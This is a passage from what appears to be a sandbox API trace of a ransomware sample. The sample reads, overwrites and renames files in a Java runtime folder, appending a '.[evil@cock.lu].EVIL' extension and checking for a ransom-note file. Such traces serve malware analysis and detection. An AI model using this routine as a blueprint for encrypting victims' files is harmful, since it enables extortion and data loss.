Files\\Java\\jre1.8.0_131\\bin\\jsound.dll") returned 50 [0092.505] wcscmp (_String1="jsound.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.505] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jsound.dll") returned 0x0 [0092.505] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsound.dll") returned 0x32 [0092.505] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsound.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.507] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x8a40, lpOverlapped=0x0) returned 1 [0092.510] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.511] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.511] _errno () returned 0x84b1160840 [0092.511] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.511] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x8a60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x8a60, lpOverlapped=0x0) returned 1 [0092.511] CloseHandle (hObject=0x1a4) returned 1 [0092.511] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsound.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.511] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.511] __uncaught_exception () returned 0x84b1160800 [0092.511] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.511] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsound.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsound.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsound.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsound.dll.[evil@cock.lu].evil")) returned 1 [0092.512] ??_V@YAXPEAX@Z () returned 0x1 [0092.515] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsound.dll", dwFileAttributes=0x0) returned 0 [0092.515] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.515] wcsstr (_Str="jsoundds.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.515] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll") returned 52 [0092.515] wcscmp (_String1="jsoundds.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.515] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jsoundds.dll") returned 0x0 [0092.515] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll") returned 0x34 [0092.515] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsoundds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.517] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x7a40, lpOverlapped=0x0) returned 1 [0092.520] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.520] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.520] _errno () returned 0x84b1160840 [0092.520] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.520] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7a60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x7a60, lpOverlapped=0x0) returned 1 [0092.520] CloseHandle (hObject=0x1a4) returned 1 [0092.520] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.521] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.521] __uncaught_exception () returned 0x84b1160800 [0092.521] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.521] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsoundds.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\jsoundds.dll.[evil@cock.lu].evil")) returned 1 [0092.522] ??_V@YAXPEAX@Z () returned 0x1 [0092.525] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\jsoundds.dll", dwFileAttributes=0x0) returned 0 [0092.526] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.526] wcsstr (_Str="kcms.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.526] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll") returned 48 [0092.526] wcscmp (_String1="kcms.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.526] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="kcms.dll") returned 0x0 [0092.526] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll") returned 0x30 [0092.526] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\kcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.529] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x35e40, lpOverlapped=0x0) returned 1 [0092.795] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.795] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.795] _errno () returned 0x84b1160840 [0092.795] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.795] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x35e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x35e60, lpOverlapped=0x0) returned 1 [0092.796] CloseHandle (hObject=0x1a4) returned 1 [0092.796] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.796] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.796] __uncaught_exception () returned 0x84b1160800 [0092.796] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.797] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\kcms.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\kcms.dll.[evil@cock.lu].evil")) returned 1 [0092.797] ??_V@YAXPEAX@Z () returned 0x1 [0092.800] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kcms.dll", dwFileAttributes=0x0) returned 0 [0092.800] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.800] wcsstr (_Str="keytool.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.800] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe") returned 51 [0092.800] wcscmp (_String1="keytool.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.800] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="keytool.exe") returned 0x0 [0092.801] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe") returned 0x33 [0092.801] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\keytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.803] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0092.825] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.825] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.825] _errno () returned 0x84b1160840 [0092.825] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0092.826] CloseHandle (hObject=0x1a4) returned 1 [0092.826] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.826] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.826] __uncaught_exception () returned 0x84b1160800 [0092.826] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.827] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\keytool.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\keytool.exe.[evil@cock.lu].evil")) returned 1 [0092.828] ??_V@YAXPEAX@Z () returned 0x1 [0092.830] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe", dwFileAttributes=0x0) returned 0 [0092.830] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.830] wcsstr (_Str="kinit.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.830] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe") returned 49 [0092.830] wcscmp (_String1="kinit.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="kinit.exe") returned 0x0 [0092.830] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe") returned 0x31 [0092.831] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\kinit.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.833] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0092.837] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.837] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.837] _errno () returned 0x84b1160840 [0092.837] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.837] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0092.868] CloseHandle (hObject=0x1a4) returned 1 [0092.868] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.869] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.869] __uncaught_exception () returned 0x84b1160800 [0092.869] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.869] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\kinit.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\kinit.exe.[evil@cock.lu].evil")) returned 1 [0092.870] ??_V@YAXPEAX@Z () returned 0x1 [0092.872] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe", dwFileAttributes=0x0) returned 0 [0092.872] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.872] wcsstr (_Str="klist.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.872] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe") returned 49 [0092.872] wcscmp (_String1="klist.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.872] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="klist.exe") returned 0x0 [0092.873] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe") returned 0x31 [0092.873] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\klist.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.874] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0092.878] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.878] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.878] _errno () returned 0x84b1160840 [0092.878] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.878] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0092.878] CloseHandle (hObject=0x1a4) returned 1 [0092.878] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.879] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.879] __uncaught_exception () returned 0x84b1160800 [0092.879] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.879] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\klist.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\klist.exe.[evil@cock.lu].evil")) returned 1 [0092.879] ??_V@YAXPEAX@Z () returned 0x1 [0092.882] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe", dwFileAttributes=0x0) returned 0 [0092.882] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.882] wcsstr (_Str="ktab.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.882] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe") returned 48 [0092.882] wcscmp (_String1="ktab.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.882] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ktab.exe") returned 0x0 [0092.882] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe") returned 0x30 [0092.882] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ktab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.885] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0092.896] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.896] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.896] _errno () returned 0x84b1160840 [0092.896] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.896] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0092.896] CloseHandle (hObject=0x1a4) returned 1 [0092.896] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.896] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.897] __uncaught_exception () returned 0x84b1160800 [0092.897] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.897] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ktab.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ktab.exe.[evil@cock.lu].evil")) returned 1 [0092.897] ??_V@YAXPEAX@Z () returned 0x1 [0092.900] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe", dwFileAttributes=0x0) returned 0 [0092.900] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.900] wcsstr (_Str="lcms.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.900] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll") returned 48 [0092.900] wcscmp (_String1="lcms.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.900] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="lcms.dll") returned 0x0 [0092.900] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll") returned 0x30 [0092.900] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\lcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x39040, lpOverlapped=0x0) returned 1 [0092.916] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.916] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.916] _errno () returned 0x84b1160840 [0092.916] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.917] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x39060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x39060, lpOverlapped=0x0) returned 1 [0092.917] CloseHandle (hObject=0x1a4) returned 1 [0092.917] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.917] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0092.917] __uncaught_exception () returned 0x84b1160800 [0092.917] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0092.918] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\lcms.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\lcms.dll.[evil@cock.lu].evil")) returned 1 [0092.918] ??_V@YAXPEAX@Z () returned 0x1 [0092.921] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\lcms.dll", dwFileAttributes=0x0) returned 0 [0092.921] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0092.921] wcsstr (_Str="management.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0092.921] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll") returned 54 [0092.921] wcscmp (_String1="management.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0092.921] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="management.dll") returned 0x0 [0092.921] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll") returned 0x36 [0092.922] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\management.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0092.923] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x9040, lpOverlapped=0x0) returned 1 [0092.933] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.933] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0092.933] _errno () returned 0x84b1160840 [0092.933] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.933] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x9060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x9060, lpOverlapped=0x0) returned 1 [0092.933] CloseHandle (hObject=0x1a4) returned 1 [0092.933] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\management.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0092.934] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 